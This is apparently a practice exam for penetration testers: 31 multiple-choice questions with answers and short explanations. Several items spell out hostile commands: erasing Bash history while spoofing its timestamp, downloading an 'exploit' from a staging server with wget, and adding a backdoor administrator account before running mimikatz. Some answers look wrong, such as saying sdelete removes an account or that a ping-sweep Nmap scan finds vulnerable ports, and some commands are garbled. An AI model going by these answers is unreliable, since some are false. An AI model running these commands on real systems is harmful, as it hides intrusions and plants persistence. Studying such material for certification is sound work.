Test Q's

Question 1

A penetration test gains access to a system and establishes persistence, and then run the following commands:

cat /dev/null > temp
touch -r .bash_history temp
mv temp .bash_history

Which of the following actions is the tester MOST likely performing?

Answer 1

Covering tracks by clearing the Bash history

The tester is most likely performing an action of covering tracks by clearing the Bash history. The tester is redirecting the Bash history to /dev/null by using the command “cat /dev/null > temp” which will clear the content of the Bash history file. The tester is then using the command “touch -r .bash_history temp” to reset the timestamp of the temp file to match the timestamp of the Bash history file. Finally, the tester is moving the temp file to replace the Bash history file using “mv temp .bash_history” command. This will clear the Bash history file and make it difficult for incident responders to track the tester’s actions on the system.

Question 2

A penetration tester is explaining the MITRE ATT&CK framework to a company’s chief legal counsel.

Which of the following would the tester MOST likely describe as a benefit of the framework?

Answer 2

Understanding the tactics of a security intrusion can help disrupt them.

MITRE ATT&CK is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community. With the creation of ATT&CK, MITRE is fulfilling its mission to solve problems for a safer world - by bringing communities together to develop more effective cybersecurity. ATT&CK is open and available to any person or organization for use at no charge.

Question 3

A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data.
Which of the following should the tester verify FIRST to assess this risk?

Answer 3

Whether sensitive client data is publicly accessible.

When assessing the security of hosted data in a cloud environment, the first thing that should be verified is whether sensitive client data is publicly accessible. This includes checking for any misconfigurations or vulnerabilities that could allow an unauthorized person to access the data. This could be accomplished by performing web application scans, network scans, and manual testing to check for any vulnerabilities that could allow for data exfiltration or unauthorized access.

It’s also important to check whether the connection between the cloud and the client is secure, whether the client’s employees are trained properly to use the platform, and whether the cloud applications were developed using a secure SDLC, but verifying whether sensitive client data is publicly accessible should be the primary focus.

Question 4

A penetration tester ran the following command on a staging server: python -m SimpleHTTPServer 9891

Which of the following commands could be used to download a file named exploit to a target machine for execution?

Answer 4

wget 10.10.51.50:9891/exploit

Question 5

Which of the following is MOST important to include in the final report of a static application-security test that was written with a team of application developers as the intended audience?

Answer 5

Quantitative impact assessments given a successful software compromise

Question 6

A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company’s employees.
Which of the following tools can help the tester achieve this goal?

Answer 6

SET

The Social Engineering Toolkit (SET) is a tool that can be used by a penetration tester to evaluate the security awareness level of a company’s employees. SET provides a framework for simulating various social engineering attacks, such as phishing emails, phone calls, and other techniques. By using SET, a penetration tester can craft convincing simulated attacks to see how employees respond. This can help to identify weaknesses in employee training and develop targeted security awareness training programs.

Question 7

Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?

Answer 7

The existence of default passwords

Question 8

Which of the following describes the reason why a penetration tester would run the command sdelete mimikatz. * on a Windows server that the tester compromised?

Answer 8

To remove the tester-created Mimikatz account

Question 9

A penetration tester is scanning a corporate lab network for potentially vulnerable services.
Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?

Answer 9

nmap 192.168.1.1-5 -PS22-25,80.

Question 10

A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client’s IP address. The tester later discovered the SOC had used sinkholing on the penetration tester’s IP address.
Which of the following MOST likely describes what happened?

Answer 10

The planning process failed to ensure all teams were notified

The penetration tester was unaware that the SOC had set up sinkholing on his IP address and was blocked from accessing the client’s IP address because the SOC team was not notified of the penetration test.

Question 11

An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems.
Which of the following is the penetration tester trying to accomplish?

Answer 11

Identify all the vulnerabilities in the environment.

Question 12

A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running.
Which of the following would BEST support this task?

Answer 12

Run nmap with the –script vulners option set against the target.

Run nmap with the –script vulners option set against the target. The –script vulners option will scan the target for vulnerabilities associated with Common Vulnerabilities and Exposures (CVEs). It can be used to identify potential CVEs that can be leveraged to gain execution on the Linux server.

Question 13

A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability.
Which of the following is the BEST way to ensure this is a true positive?

Answer 13

Perform a manual test on the server.

Question 14

A penetration tester has been given eight business hours to gain access to a client’s financial system.
Which of the following techniques will have the HIGHEST likelihood of success?

Answer 14

Performing spear phishing against employees by posing as senior management

Question 15

A company’s Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired to test the security of the WiFi’s router.
Which of the following is MOST vulnerable to a brute-force attack?

Answer 15

WPS

Question 16

A penetration tester writes the following script:

for x in ‘seq 1 254’; do
ping -c 1 10.10.1.$x;
done

Which of the following objectives is the tester attempting to achieve?

Answer 16

Determine active hosts on the network

Question 17

A penetration tester ran the following commands on a Windows server:

schtasks
echo net user svsaccount password /add&raquo_space; batchjopb3.bat
echo net localgroup Administrators svsaccount /add&raquo_space; batchjopb3.bat
net user svsaccount
runas /user:svsaccount mimikatz

Which of the following should the tester do AFTER delivering the final report?

Answer 17

Remove the tester-created credentials.

The tester has created a new user account (svsaccount) and set the password to “password”, and then added the user account to the local Administrators group. The tester also ran mimikatz, which is a tool that allows the tester to obtain clear text password, hashes, and other sensitive information. After delivering the final report, the tester should remove the tester-created credentials by running the following command: “net user svsaccount /delete”. This will remove the tester-created user account and its associated credentials.

Question 18

A penetration tester has established an on-path attack position and must now specially craft a DNS query response to be sent back to a target host.
Which of the following utilities would BEST support this objective?

Answer 18

Scapy

Scapy is a powerful packet manipulation tool designed to craft and send custom Network Layer, Transport Layer, and Application Layer packets. It can be used to craft and send custom DNS query responses back to a target host, which can be used to bypass filtering and gain access to protected or restricted networks.

Question 19

A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test.
Which of the following describes the scope of the assessment?

Answer 19

Unknown environment testing

Question 20

A consulting company is completing the Rules of Engagement (ROE) during scoping.
Which of the following should be included in the ROE?

Answer 20

Testing restrictions

Question 21

A new client hired a penetration-testing company for a month-long contract for various security assessments against the client’s new service. The client is expecting to make the new service publicly available shortly after the assessment is complete and is planning to fix any findings, except for critical issues, after the service is made public. The client wants a simple report structure and does not want to receive daily findings.
Which of the following is most important for the penetration tester to define FIRST?

Answer 21

Establish the threshold of risk to escalate to the client immediately.

The most important thing for the penetration tester to define first is the threshold of risk to escalate to the client immediately. The client has stated that it wants to fix any findings, except for critical issues, after the service is made public. Therefore, it’s important for the penetration tester to establish with the client the level of risk that would warrant an immediate escalation, so that the client can take action to fix the issue before the service is made public. This will help to mitigate the impact of any potential vulnerabilities on the new service and its users.

Question 22

A penetration tester logs in as a user in the cloud environment of a company.
Which of the following Pacu modules will enable the tester to determine the level of access of the existing user?

Answer 22

iam_enum_permissions

The Pacu tool is a framework for penetration testing AWS environments, it has several modules that can be used to perform various tasks. In this scenario, the tester wants to determine the level of access of an existing user in the cloud environment. The Pacu module that enables the tester to determine the level of access of the existing user is iam_enum_permissions. This module allows the tester to enumerate all the permissions and policies associated with the user. It can be used to check the permissions of the user and check what actions the user can perform within the environment

Question 23

A company becomes concerned when the security alarms are triggered during a penetration test.
Which of the following should the company do NEXT?

Answer 23

Deconflict with the penetration tester

Question 24

A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client’s building. Exterior reconnaissance identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet.
Which of the following tools or techniques would BEST support additional reconnaissance?

Answer 24

Shodan

Shodan is a search engine for Internet-connected devices. It allows a user to search for specific types of devices or services, such as cameras, servers, or routers, connected to the Internet. This tool can be useful in identifying additional information about the client’s building, such as the make and model of the security cameras, or any other devices connected to the Internet. It can provide additional information that would be useful in identifying potential vulnerabilities that can be exploited during the physical penetration test.
Wardriving is a technique to detect wireless access points, Aircrack-ng is a tool that allows you to crack wifi password, Recon-ng is a reconnaissance tool that can be used to gather information about a target, but it is more useful for web-based reconnaissance.

Question 25

A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important data.
Which of the following was captured by the testing team?

Answer 25

User hashes sent over SMB

Responder is used to capture user hashes sent over SMB, NetBIOS, LLMNR and NBT-NS. It is a powerful tool used by red teams to capture user hashes that can then be used to gain access to the network or other systems.

Question 26

A penetration tester conducts an Nmap scan against a target and receives the following result:

Port State Service
1080/tcp open socks

Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target?

Answer 26

ProxyChains

ProxyChains is a tool that allows a user to redirect TCP connections through proxy servers. In this case, the tester can use ProxyChains to redirect their scanning tools through TCP port 1080 on the target, which is open and running the SOCKS service. This can be useful in situations where the target has restricted access to certain ports or where the tester wants to conceal their IP address.

Question 27

A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals.
Which of the following should the tester do NEXT?

Answer 27

Reach out to the primary point of contact

The tester should immediately reach out to the primary point of contact (often known as the incident response team) to inform them of the ongoing attack. This will allow the organization to take immediate action to mitigate the attack and prevent further damage. The primary point of contact would be responsible for coordinating the incident response, including notifying other stakeholders, such as legal department, IT department, and management, about the incident.

Question 28

A penetration tester received a .pcap file to look for credentials to use in an engagement.
Which of the following tools should the tester utilize to open and read the .pcap file?

Answer 28

Wireshark

Question 29

A penetration tester ran an Nmap scan on an Internet-facing network device with the -F option and found a few open ports. To further enumerate, the tester ran another scan using the following command: nmap -O -A -sS -p- 100.100.100.50
Nmap returned that all 65,535 ports were filtered
Which of the following MOST likely occurred on the second scan?

Answer 29

A firewall or IPS blocked the scan.

Question 30

A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:
✑ Have a full TCP connection
✑ Send a hello payload
✑ Wait for a response
✑ Send a string of characters longer than 16 bytes

Which of the following approaches would BEST support the objective?

Answer 30

Create a script in the Lua language and use it with Nmap Scripting Engine (NSE).

Question 31

Performing a penetration test against an environment with SCADA devices brings an additional safety risk because the:

Answer 31

devices may cause physical world effects.

SCADA devices have the potential to cause physical world effects, such as opening a safety valve or switching on a pump, so they need to be treated with particular care when performing penetration testing.